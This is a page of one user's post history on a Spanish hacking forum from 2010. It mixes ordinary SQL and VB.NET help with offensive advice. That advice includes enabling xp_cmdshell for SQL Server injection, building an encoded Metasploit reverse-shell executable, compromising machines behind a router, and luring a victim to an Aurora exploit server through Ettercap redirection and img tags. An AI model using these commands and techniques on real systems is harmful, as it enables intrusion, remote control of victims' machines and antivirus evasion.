elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: 1 ... 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 [344] 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 ... 368
3431  Seguridad Informática / Nivel Web / Re: Pregunta sobre inyeccion sqlserver. en: 19 Febrero 2010, 19:20 pm
Creo que es...
Código
  1. EXEC sp_configure 'show advanced options', 1
  2. RECONFIGURE
  3.  
  4. EXEC sp_configure 'xp_cmdshell', 1
  5. RECONFIGURE
3432  Programación / Bases de Datos / Re: Problema con una consulta SQL en: 18 Febrero 2010, 22:55 pm
Tienes un ( demás. Mirad
Código
  1. SELECT t.CODPRO, t.DESPRO, t.CODLAB, a.DESLAB, t.PRISAL , /*Aqui*/  (  /*Aqui*/ (t.PRISAL -(t.PRISAL / t.DTOPRO)*100) AS PRECIO_TOTAL
  2. FROM surf10 t, surffa a
  3. WHERE t.codlab = a.codlab

ó Intentad:
Código
  1. SELECT	surf10.CODPRO,
  2. 		surf10.DESPRO,
  3. 		surf10.CODLAB,
  4. 		surffa.DESLAB,
  5. 		surf10.PRISAL,
  6. 		(t.PRISAL -(t.PRISAL / t.DTOPRO)*100) AS PRECIO_TOTAL
  7. FROM surf10 INNER JOIN surffa
  8. WHERE surf10.codlab = surffa.codlab
3433  Seguridad Informática / Hacking / Re: ok, estoy en el router.. en: 18 Febrero 2010, 19:28 pm
Cita de: kamsky en 18 Febrero 2010, 14:17 pm
..., así que recomiendo a TODO el mundo, no sólo a ti, que antes de usar herramientas que te lo dan todo hecho, aprendan a hacer las cosas y entender el porqué, y luego ya usa las tools que quieras...
Es verdad lo que dice kamsky. ;D


Cita de: illera88 en 18 Febrero 2010, 15:26 pm
el que suele utilizar shell root en sus tutos y yo también
xD, pero no solo lo uso porque sea el unico que sé explotar, solo que como voy a explicar cosas diferentes a la explotancio de los fallos de servicios, uso ese.
3434  Seguridad Informática / Hacking / Re: Encoders de Metasploit en: 18 Febrero 2010, 17:31 pm
mmm Los Encoders son usandos de 2 formás!

1. Dentro de la consola Shell de Linux (Pará ver las opciones ejecutar ./msfencode -h)
Código:
shell@Alex:~/msf3$ ./msfencode -h

y para usarlo con un archivo binario. Así:
Código:
shell@Alex:~/msf3$ ./msfpayload windows/shell_reverse_tcp LHOST=172.0.0.1 LPORT=1234 R | ./msfencode -e x86/shikata_ga_nai -t exe > /home/shellroot/Archivo_Codificado1.exe

2. Al momento de lanzar un Exploit
En ocasiones al momento de lanzar un exploit, nos saldra un hermoso mensaje de... Exploit failed: No encoders encoded the buffer successfully... ahora para solucionar este failed, ejecutamos show encoders, para visualizar los que son soportados por el exploit, y despues, SET Nombre_Encoder.


Con respecto a la otra duda, de encodear un archivo *.PDF, no tengo ni la más minima idea... xD
3435  Seguridad Informática / Hacking / Re: [Metasploit + 0-day IE] Exploit IE_Aurora en: 18 Febrero 2010, 17:04 pm
Exacto!
3436  Seguridad Informática / Hacking / Re: ok, estoy en el router.. en: 18 Febrero 2010, 05:41 am
Intentad conseguir que un puerto sea redirigido hacia vos, con esto podes usar el metasploit y comprometer a todas las maquinas conectadas al router!
3437  Seguridad Informática / Hacking / Re: [Metasploit + 0-day IE] Exploit IE_Aurora en: 18 Febrero 2010, 03:41 am
illera88, depende de como esté tu situación, imagina que estás en red con la victima, realizas una redirección con Ettercap y voala, tenes lo que querás. Tambien podes hacer uso de la tecnica URL OBFUSCATION.

PD: Creo que sirve algo como esto. No sé!
Código:
[img=http://172.0.0.1:8080/][/img]
ó
Código:
<img src="http://172.0.0.1:8080/" />
3438  Programación / .NET (C#, VB.NET, ASP) / Re: Problemas al crear una base de datos sql en VB.NET en: 18 Febrero 2010, 00:31 am
Aver, no dije DIRECTAMENTE, que era el Nombre_del_PC/SQLEXPRESS, es el nombre que le diste a la instancia del SQL, cuando se está instalando. Ahora, veo que el error no es en la conexion del SQL, sino al momento de crear la base de datos.

Leeté esto http://www.elguille.info/NET/adonet/Crear_una_base_de_datos_de_SQL_Server_mediante_codigo_de_Visual_Basic.htm

Saludos!
3439  Programación / .NET (C#, VB.NET, ASP) / Re: Problemas al crear una base de datos sql en VB.NET en: 17 Febrero 2010, 18:10 pm
Dentro de la variable de conexión
Código
  1.  Dim myConn As SqlConnection = New SqlConnection("Server=127.0.0.1;uid=sa;pwd=;database=master")

Deberia ser así: (Ejemplo en SQL Server 2008)
Código
  1. Public strcnn As New SqlConnection("Data Source=ALEX\SHELLROOT;Initial Catalog=BD_HackLAB;Integrated Security=SSPI;")

Donde dicé Data Source=ALEX\SHELLROOT;, al momento de realizar la instalación, le podes asiganar el nombre de la instacia del SQL, por lo generar es Nombre_del_Equipo\SQLEXPRESS.

PD: http://www.connectionstrings.com/ Selecciona el Motor de Base de Datos que estas usando y mirás los String de Conexión
3440  Seguridad Informática / Hacking / Re: metasploit para vista en: 17 Febrero 2010, 00:59 am
Cita de: beholdthe en 17 Febrero 2010, 00:38 am
entonces que me sugieres, que lo instale mejor asi como me dices tu, o q siga los pasos de la pagina oficial que puse en el enlace¿?¡
Eso lo decides tú


Cita de: beholdthe en 17 Febrero 2010, 00:38 am
si me sirve los comandos q me has dado tu par instalar la ultima version del metasploit  en mi ubuntu 9.04   perfecto
Emm así lo hicé en Ubuntu 9.10
Páginas: 1 ... 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 [344] 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 ... 368
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines